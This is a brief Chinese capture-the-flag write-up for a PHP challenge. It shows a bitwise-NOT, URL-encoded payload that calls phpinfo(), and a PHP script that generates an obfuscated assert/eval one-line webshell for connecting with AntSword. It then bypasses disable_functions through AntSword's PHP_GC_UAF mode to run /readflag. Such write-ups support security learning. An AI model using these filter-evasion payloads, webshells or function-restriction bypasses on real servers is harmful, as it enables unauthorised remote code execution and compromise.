查找php的信息
?code=(~%8F%97%8F%96%91%99%90)();
构造一个shell连上蚁剑
使用一句话木马
<?php
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST["test"]))';
$d=urlencode(~$c);
echo $d;
?>
进入之后直接找根目录下的flag
下面有两个文件,但是我们的shell不能执行命令
原因是我们之前查找phpinfo的时候,disable_functions 禁用了太多函数,我们需要绕开disable_functions
然后蚁剑有一个插件有这样的功能
选择PHP_GC_UAF模式
输入/readflag,得到flag